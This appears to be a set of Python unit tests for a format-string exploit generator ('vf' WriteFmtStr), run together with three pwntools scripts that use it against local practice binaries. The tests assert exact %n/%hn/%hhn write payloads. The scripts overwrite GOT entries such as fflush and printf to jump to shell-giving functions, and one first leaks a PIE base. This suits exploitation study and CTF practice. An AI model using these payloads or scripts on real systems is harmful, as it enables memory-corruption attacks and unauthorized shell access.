def test(self): fs = vf.WriteFmtStr(value=0x08044008, address=0x08046030, offset=10, alignment_bytes=20) test_fmt_str = fs.generate_fmt_str() correct_fmt_str = b'000000000000000000000`\x04\x082`\x04\x08%16364x%10$hn%51196x%11$hn' self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self): fs = vf.WriteFmtStr(value=0x402010, address=0x601030, offset=10, arch="64") test_fmt_str = fs.generate_fmt_str() correct_fmt_str = b'%8208c%17$hn%57392c%18$hn%65472c%19$hn%65536c%20$hn000000\x10`\x00\x00\x00\x00\x002\x10`\x00\x00\x00\x00\x004\x10`\x00\x00\x00\x00\x006\x10`\x00\x00\x00\x00\x00' self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self): fs = vf.WriteFmtStr(value=0x08044008, address=0x08046030, offset=10, num_writes=4) test_fmt_str = fs.generate_fmt_str() correct_fmt_str = b'0`\x04\x081`\x04\x082`\x04\x083`\x04\x08%248x%10$hhn%312x%11$hhn%196x%12$hhn%260x%13$hhn' self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self): fs = vf.WriteFmtStr(value=0x402010, address=0x601030, offset=10, write_sizes=[2, 1, 2]) test_fmt_str = fs.generate_fmt_str() correct_fmt_str = b'0\x10`\x002\x10`\x003\x10`\x00%8196x%10$hn%304x%11$hhn%57024x%12$hn' self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self): fs = vf.WriteFmtStr(value=0x08044008, address=0x08046030, offset=10, max_size=30) test_fmt_str = fs.generate_fmt_str() correct_fmt_str = b'0`\x04\x082`\x04\x08%16384x%10$hn%51196x%11$hn' self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self): fs = vf.WriteFmtStr(value=0x00004008, address=0x8045060, valueBase=0x55440000, offset=10) test_fmt_str = fs.generate_fmt_str() correct_fmt_str = b'`P\x04\x08bP\x04\x08%16384x%10$hn%49144x%11$hn' self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self): fs = vf.WriteFmtStr(value=0x08044008, address=0x00006030, address_base=0x55440000, offset=10) test_fmt_str = fs.generate_fmt_str() correct_fmt_str = b'0`DU2`DU%16384x%10$hn%51196x%11$hn' self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self): fs = vf.WriteFmtStr(value=0x08044008, address=0x08046030, offset=10, max_size=20) test_fmt_str = fs.generate_fmt_str() correct_fmt_str = b'0`\x04\x08%134496260x%10$n' self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self): fs = vf.WriteFmtStr(value=0x001020, address=0x601020, value_base=0x55440000, offset=10, arch=64) test_fmt_str = fs.generate_fmt_str() correct_fmt_str = b'%4128c%17$hn%17700c%18$hn%43708c%19$hn%65536c%20$hn00000 \x10`\x00\x00\x00\x00\x00"\x10`\x00\x00\x00\x00\x00$\x10`\x00\x00\x00\x00\x00&\x10`\x00\x00\x00\x00\x00' self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self): fs = vf.WriteFmtStr(value=0x08044008, address=0x08046030, offset=10, max_size=88, arch=64) test_fmt_str = fs.generate_fmt_str() correct_fmt_str = b'%16392c%17$hn%51196c%18$hn%63484c%19$hn%65536c%20$hn00000`\x04\x08\x00\x00\x00\x002`\x04\x08\x00\x00\x00\x004`\x04\x08\x00\x00\x00\x006`\x04\x08\x00\x00\x00\x00' self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self): fs = vf.WriteFmtStr(value=0x08044008, address=0x08046030, offset=10, max_size=56, arch=64) test_fmt_str = fs.generate_fmt_str() correct_fmt_str = b'%134496264c%15$n%4160471032c%16$n00000000`\x04\x08\x00\x00\x00\x004`\x04\x08\x00\x00\x00\x00' self.assertTrue(test_fmt_str == correct_fmt_str)
def test(self): fs = vf.WriteFmtStr(value=0x402010, address=0x601030, offset=10, arch=64, num_writes=8) test_fmt_str = fs.generate_fmt_str() correct_fmt_str = b'%16c%23$hhn%16c%24$hhn%32c%25$hhn%192c%26$hhn%256c%27$hhn%256c%28$hhn%256c%29$hhn%256c%30$hhn000000000000\x10`\x00\x00\x00\x00\x001\x10`\x00\x00\x00\x00\x002\x10`\x00\x00\x00\x00\x003\x10`\x00\x00\x00\x00\x004\x10`\x00\x00\x00\x00\x005\x10`\x00\x00\x00\x00\x006\x10`\x00\x00\x00\x00\x007\x10`\x00\x00\x00\x00\x00' self.assertTrue(test_fmt_str == correct_fmt_str)
import vf from pwn import * target = process("./vf_64") elf = ELF("vf_64") fs = vf.WriteFmtStr(value=elf.symbols["pwned"], address=elf.got["fflush"], offset=6, arch=64) fmtStr = fs.generate_fmt_str() #print("try: %s" % str(fmtStr)) target.sendline(fmtStr) target.interactive()
import vf from pwn import * target = process("./vf_pie") elf = ELF("vf_pie") leak = target.recvline() leak = leak.split(b"dreaming: ")[1] leak = leak.strip(b"\n") pieBase = int(leak, 16) - elf.symbols["main"] print("pie base: %s" % hex(pieBase)) fs = vf.WriteFmtStr(value=elf.symbols["pwned"], address=elf.got["fflush"], value_base=pieBase, address_base=pieBase, offset=6) fmtStr = fs.generate_fmt_str() print("try: %s" % str(fmtStr)) target.sendline(fmtStr) target.interactive()
from pwn import * import vf target = process("format1") elf = ELF("format1") fs = vf.WriteFmtStr(value=elf.symbols["give_shell"], address=elf.got["printf"], offset=8, arch=64) fmt_st = fs.generate_fmt_str() target.sendline(fmt_st) target.interactive()
def test(self): fs = vf.WriteFmtStr(value=0x402010, address=0x601030, offset=10, arch=64, write_sizes=[2, 1, 2, 1, 2, 2]) test_fmt_str = fs.generate_fmt_str() correct_fmt_str = b'%8208c%21$hn%304c%22$hhn%57024c%23$hn%256c%24$hhn%65280c%25$hn%65536c%26$hn00000000000000\x10`\x00\x00\x00\x00\x002\x10`\x00\x00\x00\x00\x003\x10`\x00\x00\x00\x00\x005\x10`\x00\x00\x00\x00\x006\x10`\x00\x00\x00\x00\x008\x10`\x00\x00\x00\x00\x00' self.assertTrue(test_fmt_str == correct_fmt_str)